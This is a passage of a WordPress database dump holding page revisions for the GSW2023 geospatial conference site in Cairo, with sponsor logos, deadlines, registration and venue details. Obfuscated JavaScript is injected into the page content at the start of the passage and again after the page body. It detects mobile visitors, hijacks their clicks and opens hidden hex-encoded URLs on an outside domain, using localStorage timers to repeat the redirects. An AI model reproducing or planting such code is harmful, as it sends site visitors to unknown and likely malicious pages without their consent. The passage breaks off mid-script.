_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 02:49:48','2023-04-02 02:49:48','',3066,'https://gsw2023.com/?p=4007',0,'revision','',0),
(4008,1,'2023-04-02 02:50:31','2023-04-02 02:50:31','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403737829{margin-top: 130px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 